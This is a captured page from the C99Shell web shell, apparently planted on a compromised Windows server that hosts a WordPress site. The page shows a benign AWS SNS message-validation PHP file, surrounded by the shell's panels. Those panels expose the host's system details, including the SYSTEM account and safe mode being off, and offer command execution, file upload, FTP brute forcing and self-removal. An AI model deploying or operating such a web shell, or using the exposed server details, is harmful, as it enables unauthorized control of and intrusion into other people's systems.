!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbre\cumbreclima\wp-content\plugins\w3-total-cache\lib\SNS\services\MessageValidator\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Message.php (3.83 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Copyright 2010-2013 Amazon.com, Inc. or its affiliates. All Rights Reserved.
 *
 * Licensed under the Apache License, Version 2.0 (the "License").
 * You may not use this file except in compliance with the License.
 * A copy of the License is located at
 *
 * http://aws.amazon.com/apache2.0
 *
 * or in the "license" file accompanying this file. This file is distributed
 * on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
 * express or implied. See the License for the specific language governing
 * permissions and limitations under the License.
 */

class Message
{
    protected static 
$requiredKeys = array(
        
'__default' => array(
            
'Message',
            
'MessageId',
            
'Timestamp',
            
'TopicArn',
            
'Type',
            
'Signature',
            
'SigningCertURL',
        ),
        
'SubscriptionConfirmation' => array(
            
'SubscribeURL',
            
'Token'
        
),
        
'UnsubscribeConfirmation' => array(
            
'SubscribeURL',
            
'Token'
        
),
    );

    protected static 
$signableKeys = array(
        
'Message',
        
'MessageId',
        
'Subject',
        
'SubscribeURL',
        
'Timestamp',
        
'Token',
        
'TopicArn',
        
'Type',
    );

    
/**
     * @var array The message data
     */
    
protected $data;

    
/**
     * Creates a Message object from an array of raw message data
     *
     * @param array $data The message data
     *
     * @return Message
     * @throws InvalidArgumentException If a valid type is not provided or there are other required keys missing
     */
    
public static function fromArray($data) {
        
// Make sure the type key is set
        
if (!isset($data['Type'])) {
            throw new 
InvalidArgumentException('The "Type" key must be provided to instantiate a Message object.');
        }

        
// Determine required keys and create a collection from the message data
        
$requiredKeys array_merge(
            
self::$requiredKeys['__default'],
            isset(
self::$requiredKeys[$data['Type']]) ? self::$requiredKeys[$data['Type']] : array()
        );
        
$data array_merge($requiredKeys$data);

        return new 
self($data);
    }

    
/**
     * Creates a message object from the raw POST data
     *
     * @return Message
     * @throws UnexpectedValueException If the POST data is absent, or not a valid JSON document
     */
    
public static function fromRawPostData() {
        
$data json_decode(file_get_contents('php://input'), true);
        if (!
is_array($data)) {
            throw new 
UnexpectedValueException('POST data absent, or not a valid JSON document'json_last_error());
        }
        return 
self::fromArray($data);
    }

    
/**
     * @param array $data A Collection of message data with all required keys
     */
    
public function __construct($data) {
        
$this->data $data;
    }

    
/**
     * Get the entire message data as a Collection
     *
     * @return array
     */
    
public function getData() {
        return 
$this->data;
    }

    
/**
     * Gets a single key from the message data
     *
     * @param string $key
     * @return string
     */
    
public function get($key) {
        return 
$this->data[$key];
    }

    
/**
     * Builds a newline delimited string to sign according to the specs
     *
     * @return string
     * @link http://docs.aws.amazon.com/sns/latest/gsg/SendMessageToHttp.verify.signature.html
     */
    
public function getStringToSign() {
        
$stringToSign '';

        
$data $this->data;
        
ksort($data);
        
$has = array();
        foreach (
$data as $key => $value) {
            if (
in_array($keyself::$signableKeys) && !in_array($key$has)) {
                
$stringToSign .= "{$key}\n{$value}\n";
                
$has[] = $key;
            }
        }

        return 
$stringToSign;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--